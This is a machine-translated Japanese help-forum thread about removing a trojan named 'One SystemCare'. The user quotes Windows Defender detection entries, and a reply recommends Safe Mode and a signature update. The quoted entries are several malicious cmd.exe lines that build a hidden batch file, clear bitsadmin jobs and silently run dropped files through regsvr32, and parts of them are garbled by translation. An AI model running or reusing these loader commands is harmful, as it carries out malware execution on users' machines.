one systemcare ウイルスを排除するには?
ウェブの閲覧中またはリソースのダウンロード中にウイルスに感染する必要があります.WDはオンにするたびに脅威を報告しますが、コントロールパネルからOne SystemCareをアンインストールし、CドライバからSystem32Taskのexeファイルを削除しても完全には削除できません...ウイルスの詳細は次のとおりです...
1つのSystemCare
タイプ:トロイの木馬
影響を受けるアイテム:
CmdLine:\Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe"/c start/min cmd/c "(echo @echo off>" C:\ProgramData\37675784-29a5- 0\x.bat "&echo bitsadmin/complete 37675784-29a5-0 ^>nul>>" C:\ProgramData\37675784-29a5-0\x.bat "&echo bitsadmin
/cancel 37675784-29a5-0 ^>nul>>"C:\ProgramData\37675784-29a5-0\x.bat"&echo存在する場合 "C:\ProgramData\37675784-29a5-0\37675784-29a5-0.d "goto q>>" C:\ProgramData\37675784-29a5-0\x.bat "&for/f%i in( 'dir/a:-d/b/w" C:\ProgramData\37675784-29a5-0\*.tmp "')
do(echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785" "C:\ProgramData\37675784-29a5-0 \%i">>"C:\ProgramData\37675784-29a5-0\x.bat"))>nul&echo:q>>"C:\ProgramData\37675784-29a5-0\x.bat"&echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785
"" C:\ProgramData\37675784-29a5-0\37675784-29a5-0.d">>" C:\ProgramData\37675784-29a5-0\x.bat "&echo del" C:\ProgramData\37675784-29a5-0\x.bat "^&exit>>" C:\ProgramData\37675784-29a5-0\x.bat "&" C:\ProgramData\37675784-29a5-0\x.bat ""
CmdLine:\Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe"/c start/min cmd/c "(echo @echo off>" C:\ProgramData\37675784-3127-1\x.bat " &echo bitsadmin/complete 37675784-3127-1 ^>nul>>"C:\ProgramData\37675784-3127-1\x.bat"&echo bitsadmin
/cancel 37675784-3127-1 ^>nul>>"C:\ProgramData\37675784-3127-1\x.bat"&echo if exist "C:\ProgramData\37675784-3127-1\37675784-3127-1.d "goto q>>" C:\ProgramData\37675784-3127-1\x.bat "&for/f%i in( 'dir/a:-d/b/w" C:\ProgramData\37675784-3127-1\*.tmp "')
do(echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785" "C:\ProgramData\37675784-3127-1 \%i">>"C:\ProgramData\37675784-3127-1\x.bat"))>nul&echo:q>>"C:\ProgramData\37675784-3127-1\x.bat"&echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785
"" C:\ProgramData\37675784-3127-1\37675784-3127-1.d">>" C:\ProgramData\37675784-3127-1\x.bat "&echo del" C:\ProgramData\37675784-3127-1\x.bat "^&exit>>" C:\ProgramData\37675784-3127-1\x.bat "&" C:\ProgramData\37675784-3127-1\x.bat ""
CmdLine:\Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe"/c start/min cmd/c "(echo @echo off>" C:\ProgramData\37675784-39e5-1\x.bat " &echo bitsadmin/complete 37675784-39e5-1 ^>nul>>"C:\ProgramData\37675784-39e5-1\x.bat"&echo bitsadmin
/cancel 37675784-39e5-1 ^>nul>>"C:\ProgramData\37675784-39e5-1\x.bat"&echo存在する場合 "C:\ProgramData\37675784-39e5-1\37675784-39e5-1.d "goto q>>" C:\ProgramData\37675784-39e5-1\x.bat "&for/f%i in( 'dir/a:-d/b/w" C:\ProgramData\37675784-39e5-1\*.tmp "')
do(echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785" "C:\ProgramData\37675784-39e5-1 \%i">>"C:\ProgramData\37675784-39e5-1\x.bat"))>nul&echo:q>>"C:\ProgramData\37675784-39e5-1\x.bat"&echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785
"" C:\ProgramData\37675784-39e5-1\37675784-39e5-1.d">>" C:\ProgramData\37675784-39e5-1\x.bat "&echo del" C:\ProgramData\37675784-39e5-1\x.bat "^&exit>>" C:\ProgramData\37675784-39e5-1\x.bat "&" C:\ProgramData\37675784-39e5-1\x.bat ""
CmdLine:\Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe"/c start/min cmd/c "(echo @echo off>" C:\ProgramData\37675784-4067-0\x.bat " &echo bitsadmin/complete 37675784-4067-0 ^>nul>>"C:\ProgramData\37675784-4067-0\x.bat"&echo bitsadmin
/cancel 37675784-4067-0 ^>nul>>"C:\ProgramData\37675784-4067-0\x.bat"&echo if exist "C:\ProgramData\37675784-4067-0\37675784-4067-0.d "goto q>>" C:\ProgramData\37675784-4067-0\x.bat "&for/f%i in( 'dir/a:-d/b/w" C:\ProgramData\37675784-4067-0\*.tmp "')
do(echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785" "C:\ProgramData\37675784-4067-0 \%i">>"C:\ProgramData\37675784-4067-0\x.bat"))>nul&echo:q>>"C:\ProgramData\37675784-4067-0\x.bat"&echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785
"" C:\ProgramData\37675784-4067-0\37675784-4067-0.d">>" C:\ProgramData\37675784-4067-0\x.bat "&echo del" C:\ProgramData\37675784-4067-0\x.bat "^&exit>>" C:\ProgramData\37675784-4067-0\x.bat "&" C:\ProgramData\37675784-4067-0\x.bat ""
CmdLine:\Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe"/c start/min cmd/c "(echo @echo off>" C:\ProgramData\37675784-5287-0\x.bat " &echo bitsadmin/complete 37675784-5287-0 ^>nul>>"C:\ProgramData\37675784-5287-0\x.bat"&echo bitsadmin
/cancel 37675784-5287-0 ^>nul>>"C:\ProgramData\37675784-5287-0\x.bat"&echo存在する場合 "C:\ProgramData\37675784-5287-0\37675784-5287-0.d "goto q>>" C:\ProgramData\37675784-5287-0\x.bat "&for/f%i in( 'dir/a:-d/b/w" C:\ProgramData\37675784-5287-0\*.tmp "')
do(echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785" "C:\ProgramData\37675784-5287-0 \%i">>"C:\ProgramData\37675784-5287-0\x.bat"))>nul&echo:q>>"C:\ProgramData\37675784-5287-0\x.bat"&echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785
"" C:\ProgramData\37675784-5287-0\37675784-5287-0.d">>" C:\ProgramData\37675784-5287-0\x.bat "&echo del" C:\ProgramData\37675784-5287-0\x.bat "^&exit>>" C:\ProgramData\37675784-5287-0\x.bat "&" C:\ProgramData\37675784-5287-0\x.bat ""
CmdLine:\Device\HarddiskVolume3\Windows\System32\cmd.exe "cmd.exe"/c start/min cmd/c "(echo @echo off>" C:\ProgramData\37675784-6405-1\x.bat " &echo bitsadmin/complete 37675784-6405-1 ^>nul>>"C:\ProgramData\37675784-6405-1\x.bat"&echo bitsadmin
/cancel 37675784-6405-1 ^>nul>>"C:\ProgramData\37675784-6405-1\x.bat"&echo if exist "C:\ProgramData\37675784-6405-1\37675784-6405-1.d "goto q>>" C:\ProgramData\37675784-6405-1\x.bat "&for/f%i in( 'dir/a:-d/b/w" C:\ProgramData\37675784-6405-1\*.tmp "')
do(echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785" "C:\ProgramData\37675784-6405-1 \%i">>"C:\ProgramData\37675784-6405-1\x.bat"))>nul&echo:q>>"C:\ProgramData\37675784-6405-1\x.bat"&echo start/b/min regsvr32.exe/s/n/i: "!= 2a461f1837675785
"" C:\ProgramData\37675784-6405-1\37675784-6405-1.d">>" C:\ProgramData\37675784-6405-1\x.bat "&echo del" C:\ProgramData\37675784-6405-1\x.bat "^&exit>>" C:\ProgramData\37675784-6405-1\x.bat "&" C:\ProgramData\37675784-6405-1\x.bat ""
返信リスト(回答:3)
削除できない、無効を削除するか、削除が成功するか、このウイルスは依然としてテストがまだある度に発生しますか?
セーフモードでウイルスをチェックしようとする
ログイン画面で、shiftキーを押しながら、「電源」アイコン-"Restart"...
「オプションを選択する」画面を再起動したら、「トラブルシューティング」>詳細オプション ">""retart"を選択します....
コンピュータを再起動した後、オプションのリストが表示されます...「セーフモード」の下のコンピュータを起動するには「4」または「F4」を選択します.または必要な場合インターネットが必要な場合、「ネットワークセキュリティモード」を入力するには、「5」または「F5」を選択してください......
同時に、基礎となるウイルスライブラリ...
を更新できます.>>更新とセキュリティ>>Windows DefenderSecurity Center>>ウイルスと脅威の保護>>ウイルスと脅威の保護の更新>>のチェック
効果を見て